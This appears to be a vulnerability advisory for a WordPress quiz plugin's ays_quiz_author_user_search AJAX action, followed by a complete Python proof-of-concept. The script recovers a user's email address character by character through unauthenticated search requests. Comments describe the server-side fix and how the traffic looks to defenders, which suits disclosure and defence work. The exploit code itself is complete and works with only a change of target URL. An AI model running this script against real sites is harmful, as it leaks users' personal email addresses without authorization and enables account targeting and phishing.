Description: The plugin does not adequately authorize the `ays_quiz_author_user_search` AJAX action, allowing an unauthenticated attacker to search the site's users and ultimately leak user email addresses.
import string
import requests
# Proof-of-concept for the authorization gap described above: the
# ays_quiz_author_user_search AJAX action answers a plain GET with no
# session cookie or nonce attached (none is sent by any request below),
# so its user-search results can be used to recover one user's email
# address one character at a time.  From the defender's side the server-side
# fix is a capability check plus nonce verification inside the action
# handler; on the wire the activity shows up as a long run of
# admin-ajax.php requests with action=ays_quiz_author_user_search whose
# `search` value grows by one character per request.
base_url = 'http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ays_quiz_author_user_search&search='
# WordPress user ID whose email address is being reconstructed.
id_to_find = 1
# Character set tried at each position of the address.
letter_candidates = string.ascii_lowercase + string.digits + '-_.'
# Known fragment; it is extended to the right first, then to the left.
email = '@'
# Find letters after @
while True:
    print("current email", email)
    for letter in letter_candidates:
        query = email + letter
        # NOTE(review): assumes the response is JSON with a `results` list of
        # objects carrying an `id` key; there is no status-code or schema
        # check, so a differently shaped reply raises here — TODO confirm
        # against the plugin's handler output.
        data = requests.get(base_url + query).json()
        if id_to_find in [item['id'] for item in data['results']]:
            email = query
            break
    else:
        # No candidate extended the match: the part after '@' is complete.
        break
# Find letters before @
while True:
    print("current email", email)
    for letter in letter_candidates:
        query = letter + email
        # Same unchecked-response assumption as in the loop above.
        data = requests.get(base_url + query).json()
        if id_to_find in [item['id'] for item in data['results']]:
            email = query
            break
    else:
        # No candidate extended the match: the part before '@' is complete.
        break